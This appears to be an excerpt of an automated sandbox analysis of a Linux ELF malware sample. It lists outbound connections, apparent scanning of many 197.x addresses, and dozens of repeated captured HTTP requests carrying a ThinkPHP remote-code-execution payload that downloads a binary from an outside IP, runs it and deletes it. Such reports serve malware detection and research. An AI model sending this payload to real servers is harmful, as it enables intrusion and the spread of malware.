    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 31.3.108.192:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.91.115.199:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 85.45.27.41:8080
    Source: global trafficTCP traffic: 192.168.2.15:6752 -> 94.255.188.120:8080
    Source: /tmp/E6l0C6FObI.elf (PID: 5827)Socket: 127.0.0.1::23455Jump to behavior
    Source: unknownTCP traffic detected without corresponding DNS query: 197.255.59.61
    Source: unknownTCP traffic detected without corresponding DNS query: 197.155.118.60
    Source: unknownTCP traffic detected without corresponding DNS query: 197.140.93.193
    Source: unknownTCP traffic detected without corresponding DNS query: 197.94.36.228
    Source: unknownTCP traffic detected without corresponding DNS query: 197.240.169.137
    Source: unknownTCP traffic detected without corresponding DNS query: 197.156.75.239
    Source: unknownTCP traffic detected without corresponding DNS query: 197.232.233.5
    Source: unknownTCP traffic detected without corresponding DNS query: 197.244.118.41
    Source: unknownTCP traffic detected without corresponding DNS query: 197.27.205.153
    Source: unknownTCP traffic detected without corresponding DNS query: 197.23.216.221
    Source: unknownTCP traffic detected without corresponding DNS query: 197.117.216.223
    Source: unknownTCP traffic detected without corresponding DNS query: 197.9.175.108
    Source: unknownTCP traffic detected without corresponding DNS query: 197.190.121.11
    Source: unknownTCP traffic detected without corresponding DNS query: 197.123.46.241
    Source: unknownTCP traffic detected without corresponding DNS query: 197.146.53.46
    Source: unknownTCP traffic detected without corresponding DNS query: 197.245.73.238
    Source: unknownTCP traffic detected without corresponding DNS query: 197.54.220.233
    Source: unknownTCP traffic detected without corresponding DNS query: 197.224.124.198
    Source: unknownTCP traffic detected without corresponding DNS query: 197.247.131.106
    Source: unknownTCP traffic detected without corresponding DNS query: 197.51.193.179
    Source: unknownTCP traffic detected without corresponding DNS query: 197.185.2.78
    Source: unknownTCP traffic detected without corresponding DNS query: 197.39.182.12
    Source: unknownTCP traffic detected without corresponding DNS query: 197.86.193.36
    Source: unknownTCP traffic detected without corresponding DNS query: 197.100.199.92
    Source: unknownTCP traffic detected without corresponding DNS query: 197.242.100.146
    Source: unknownTCP traffic detected without corresponding DNS query: 197.240.50.107
    Source: unknownTCP traffic detected without corresponding DNS query: 197.253.178.177
    Source: unknownTCP traffic detected without corresponding DNS query: 197.163.48.77
    Source: unknownTCP traffic detected without corresponding DNS query: 197.200.161.248
    Source: unknownTCP traffic detected without corresponding DNS query: 197.30.150.205
    Source: unknownTCP traffic detected without corresponding DNS query: 197.145.155.228
    Source: unknownTCP traffic detected without corresponding DNS query: 197.181.142.56
    Source: unknownTCP traffic detected without corresponding DNS query: 197.66.175.231
    Source: unknownTCP traffic detected without corresponding DNS query: 197.40.202.138
    Source: unknownTCP traffic detected without corresponding DNS query: 197.254.121.67
    Source: unknownTCP traffic detected without corresponding DNS query: 197.7.115.249
    Source: unknownTCP traffic detected without corresponding DNS query: 197.17.45.55
    Source: unknownTCP traffic detected without corresponding DNS query: 197.158.67.122
    Source: unknownTCP traffic detected without corresponding DNS query: 197.26.165.255
    Source: unknownTCP traffic detected without corresponding DNS query: 197.44.77.144
    Source: unknownTCP traffic detected without corresponding DNS query: 197.245.119.108
    Source: unknownTCP traffic detected without corresponding DNS query: 197.19.29.153
    Source: unknownTCP traffic detected without corresponding DNS query: 197.120.199.234
    Source: unknownTCP traffic detected without corresponding DNS query: 197.176.240.216
    Source: unknownTCP traffic detected without corresponding DNS query: 197.169.171.219
    Source: unknownTCP traffic detected without corresponding DNS query: 197.125.83.44
    Source: unknownTCP traffic detected without corresponding DNS query: 197.69.237.149
    Source: unknownTCP traffic detected without corresponding DNS query: 197.144.171.76
    Source: unknownTCP traffic detected without corresponding DNS query: 197.88.59.149
    Source: unknownTCP traffic detected without corresponding DNS query: 197.187.160.223
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
    Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
